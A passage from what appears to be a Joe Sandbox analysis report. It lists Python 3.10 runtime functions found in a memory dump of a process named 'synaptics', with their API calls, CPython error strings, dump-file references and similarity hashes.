                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,null argument to internal routine), ref: 6C451AB7
                                                                                                                                                                                                        • Part of subcall function 6C5657C0: _PyErr_SetObject.PYTHON310(?,?,00000000,00000000,6C73BD78,input too long,?,?,?,6C44EA96,?,null argument to internal routine), ref: 6C565807
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • '%.200s' object does not support indexing, xrefs: 6C451B19
                                                                                                                                                                                                      • null argument to internal routine, xrefs: 6C451AAB
                                                                                                                                                                                                      • %.200s is not a sequence, xrefs: 6C451B0F
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$ObjectString
                                                                                                                                                                                                      • String ID: %.200s is not a sequence$'%.200s' object does not support indexing$null argument to internal routine
                                                                                                                                                                                                      • API String ID: 1622067708-948959295
                                                                                                                                                                                                      • Opcode ID: 166fb0ac9829106bfd1990dd818df04e795d88b44f60f50b33f78da8dce6f187
                                                                                                                                                                                                      • Instruction ID: cd4863ce90dba20a53f4bb95a5014b01db872f91e94d0b9bd66375f1a0fc23fd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 166fb0ac9829106bfd1990dd818df04e795d88b44f60f50b33f78da8dce6f187
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9511063B742104AFEB02DE55EC80E5A77A9EF8026E7444039EC2C87F21E722DC25C7A0
                                                                                                                                                                                                      Function 6C551B70 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 70COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyUnicode_FromString.PYTHON310(strict,00000000,00000000,00000001,?,?,6C4D85AC,00000001), ref: 6C551BB1
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(unknown error handler name '%.400s',strict,?,?,?,?,?,00000000,?,?,?,6C4DA72B,?,?,00000001), ref: 6C551BD8
                                                                                                                                                                                                        • Part of subcall function 6C553610: PyList_New.PYTHON310(00000000,00000000,?,00000001,?,?,?,?,?,00000000,?,?,?,6C4DA72B,?,?), ref: 6C553637
                                                                                                                                                                                                        • Part of subcall function 6C553610: PyCMethod_New.PYTHON310(6C74DD84,00000000,00000000,00000000,00000001,?,?,?,?,?,00000000,?,?,?,6C4DA72B,?), ref: 6C5536A2
                                                                                                                                                                                                        • Part of subcall function 6C553610: PyUnicode_FromString.PYTHON310(encodings,?,?,?,?,?,?,?,00000001,?,?,?,?,?,00000000), ref: 6C55374A
                                                                                                                                                                                                        • Part of subcall function 6C553610: PyImport_Import.PYTHON310(00000000,?,?,?,?,?,?,?,?,00000001,?,?,?,?,?,00000000), ref: 6C553759
                                                                                                                                                                                                      • PyDict_GetItemWithError.PYTHON310(?,00000000,?,?,?,00000000,?,?,?,6C4DA72B,?,?,00000001), ref: 6C551BEB
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FromStringUnicode_$Dict_Err_ErrorFormatImportImport_ItemList_Method_With
                                                                                                                                                                                                      • String ID: strict$unknown error handler name '%.400s'
                                                                                                                                                                                                      • API String ID: 1366423730-1473117067
                                                                                                                                                                                                      • Opcode ID: 30f124fe1ff9610febe3652a8a9f09d85cdcc0486474ccdee25fca05995ca624
                                                                                                                                                                                                      • Instruction ID: 646666743b6f851ea7ef82ccb153186217a714b6e1139b4a2364da8080e05803
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 30f124fe1ff9610febe3652a8a9f09d85cdcc0486474ccdee25fca05995ca624
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 63110A36B042155BC6108EAAEC41A97B7E8DB8537AF440276ED18C3B60E721EC6587E5
                                                                                                                                                                                                      Function 6C451D40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 66COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,null argument to internal routine), ref: 6C451D63
                                                                                                                                                                                                        • Part of subcall function 6C5657C0: _PyErr_SetObject.PYTHON310(?,?,00000000,00000000,6C73BD78,input too long,?,?,?,6C44EA96,?,null argument to internal routine), ref: 6C565807
                                                                                                                                                                                                      • _PySlice_FromIndices.PYTHON310(?,?), ref: 6C451D89
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • null argument to internal routine, xrefs: 6C451D57
                                                                                                                                                                                                      • '%.200s' object doesn't support slice assignment, xrefs: 6C451DC1
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$FromIndicesObjectSlice_String
                                                                                                                                                                                                      • String ID: '%.200s' object doesn't support slice assignment$null argument to internal routine
                                                                                                                                                                                                      • API String ID: 2496799854-3688816455
                                                                                                                                                                                                      • Opcode ID: 7b57062e6aec753c8d345b7916698eb65040d984e701850ab5a603f0a2ea3241
                                                                                                                                                                                                      • Instruction ID: a6d5e77e7820cfee0eb394c5f82ff8f61c0540d92cbb5c8d9cce505d868711e3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b57062e6aec753c8d345b7916698eb65040d984e701850ab5a603f0a2ea3241
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2811A736601104ABCF01CE95EC40DD57765EB8127AB144335E92C8BFA1C731EC65DBE0
                                                                                                                                                                                                      Function 6C451DE0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 66COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,null argument to internal routine), ref: 6C451E03
                                                                                                                                                                                                        • Part of subcall function 6C5657C0: _PyErr_SetObject.PYTHON310(?,?,00000000,00000000,6C73BD78,input too long,?,?,?,6C44EA96,?,null argument to internal routine), ref: 6C565807
                                                                                                                                                                                                      • _PySlice_FromIndices.PYTHON310(?,?), ref: 6C451E29
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • '%.200s' object doesn't support slice deletion, xrefs: 6C451E60
                                                                                                                                                                                                      • null argument to internal routine, xrefs: 6C451DF7
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$FromIndicesObjectSlice_String
                                                                                                                                                                                                      • String ID: '%.200s' object doesn't support slice deletion$null argument to internal routine
                                                                                                                                                                                                      • API String ID: 2496799854-114744853
                                                                                                                                                                                                      • Opcode ID: 98d08ad414746d1873d1a86ff37aa8e9170def4e1024edc5b59459c42eb0f96d
                                                                                                                                                                                                      • Instruction ID: f43905ee3a0b4a7cabd879a3779d3a75fbc4c2bbafcaeb692315e55f243dce73
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 98d08ad414746d1873d1a86ff37aa8e9170def4e1024edc5b59459c42eb0f96d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA1106377012009BCB00CE99EC80E8A7765EB8177AB184235E92C8BBA0C731DC65C7E0
                                                                                                                                                                                                      Function 6C467E10 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _Py_CheckFunctionResult.PYTHON310(?,?,00000000,00000000), ref: 6C467E46
                                                                                                                                                                                                      • _PyObject_MakeTpCall.PYTHON310(?,?,00000000,00000000,00000000), ref: 6C467E5A
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,argument list must be a tuple), ref: 6C467E7E
                                                                                                                                                                                                      • _PyObject_Call.PYTHON310(?,?,?,00000000), ref: 6C467E93
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • argument list must be a tuple, xrefs: 6C467E72
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CallObject_$CheckErr_FunctionMakeResultString
                                                                                                                                                                                                      • String ID: argument list must be a tuple
                                                                                                                                                                                                      • API String ID: 164053467-336911744
                                                                                                                                                                                                      • Opcode ID: 0b4be17d47717effca5289156b320e65ce3e50511d6e64c767c25402705c3e58
                                                                                                                                                                                                      • Instruction ID: 437f08f7d2261f03def6456ae1417969c9679275c72e42ffd8287f077b05a259
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0b4be17d47717effca5289156b320e65ce3e50511d6e64c767c25402705c3e58
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC0126723042047AE710DA4AEC41FBB776CDB81B6AF04402DFA0C8AA81E361F81996F0
                                                                                                                                                                                                      Function 6C451B40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,null argument to internal routine), ref: 6C451B63
                                                                                                                                                                                                        • Part of subcall function 6C5657C0: _PyErr_SetObject.PYTHON310(?,?,00000000,00000000,6C73BD78,input too long,?,?,?,6C44EA96,?,null argument to internal routine), ref: 6C565807
                                                                                                                                                                                                      • _PySlice_FromIndices.PYTHON310(?,?), ref: 6C451B88
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • '%.200s' object is unsliceable, xrefs: 6C451BBD
                                                                                                                                                                                                      • null argument to internal routine, xrefs: 6C451B57
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$FromIndicesObjectSlice_String
                                                                                                                                                                                                      • String ID: '%.200s' object is unsliceable$null argument to internal routine
                                                                                                                                                                                                      • API String ID: 2496799854-4097758344
                                                                                                                                                                                                      • Opcode ID: 9de72f22b49a5d9b54e28d10847e16646c4398f058f39040d07c68f057019656
                                                                                                                                                                                                      • Instruction ID: a98e795e8fe99c55968f1996fc0cdc1b9def8b3653f089e5f11a5eed505c5bd7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9de72f22b49a5d9b54e28d10847e16646c4398f058f39040d07c68f057019656
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1611C632A01104AFCB01CE96EC40D867BA5EB8027AB584279E91C87B21E735D865D7E0
                                                                                                                                                                                                      Function 6C4AAF80 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 62COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(expected PickleBuffer, %.200s found,?), ref: 6C4AAFA6
                                                                                                                                                                                                        • Part of subcall function 6C566B50: _PyErr_Clear.PYTHON310(?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B62
                                                                                                                                                                                                        • Part of subcall function 6C566B50: PyUnicode_FromFormatV.PYTHON310(?,00000001,?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B6C
                                                                                                                                                                                                        • Part of subcall function 6C566B50: _PyErr_SetObject.PYTHON310(?,?,00000000,?,00000001,?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B78
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73D6C0,00000000,00000000,00000000,00000000), ref: 6C4AAFE3
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • expected PickleBuffer, %.200s found, xrefs: 6C4AAF9B
                                                                                                                                                                                                      • *tl, xrefs: 6C4AAF90
                                                                                                                                                                                                      • operation forbidden on released PickleBuffer object, xrefs: 6C4AAFCE
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$FormatObject$ClearFromUnicode_
                                                                                                                                                                                                      • String ID: expected PickleBuffer, %.200s found$operation forbidden on released PickleBuffer object$*tl
                                                                                                                                                                                                      • API String ID: 2516271747-3822097675
                                                                                                                                                                                                      • Opcode ID: 9753f5d70883b4e172ff07c1a0d4d9a4ab450590d9b50711eb25b61aba4b8d7e
                                                                                                                                                                                                      • Instruction ID: 9193fab65450bc63bd498bc63a51a829b357e935faa5d11d443bf6fd9c657438
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9753f5d70883b4e172ff07c1a0d4d9a4ab450590d9b50711eb25b61aba4b8d7e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0014E727441085BD71089DAFC81FA2B3A8DBA523FF1441B5ED1CCBB91EA12AC1587E1
                                                                                                                                                                                                      Function 6C480CD0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 61COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyType_IsSubtype.PYTHON310(5CDD04C4,?,00000000,?,?,?,6C46DB07,?,?,?), ref: 6C480D1E
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • must be real number, not %.50s, xrefs: 6C480E33
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: SubtypeType_
                                                                                                                                                                                                      • String ID: must be real number, not %.50s
                                                                                                                                                                                                      • API String ID: 2891779845-1340787544
                                                                                                                                                                                                      • Opcode ID: 80df6abe98ef51c268c101a6234d5c8f19e82c2e781236da3eae4cadf70eaf4f
                                                                                                                                                                                                      • Instruction ID: 336cd67a707b953d05295772ac74f878d96ef066ad66c073644748a501bc0e50
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80df6abe98ef51c268c101a6234d5c8f19e82c2e781236da3eae4cadf70eaf4f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7A01263270351497C6019D5ABD41FE7B764EB8113FF1902BADC5C92F20EB21E828C2E1
                                                                                                                                                                                                      Function 6C47A450 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 58COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(00000000,6C73BFE8,__traceback__ may not be deleted), ref: 6C47A478
                                                                                                                                                                                                        • Part of subcall function 6C5657C0: _PyErr_SetObject.PYTHON310(?,?,00000000,00000000,6C73BD78,input too long,?,?,?,6C44EA96,?,null argument to internal routine), ref: 6C565807
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(00000000,6C73BFE8,__traceback__ must be a traceback or None), ref: 6C47A4B2
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • __traceback__ must be a traceback or None, xrefs: 6C47A4AB
                                                                                                                                                                                                      • Pntl, xrefs: 6C47A490
                                                                                                                                                                                                      • __traceback__ may not be deleted, xrefs: 6C47A471
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
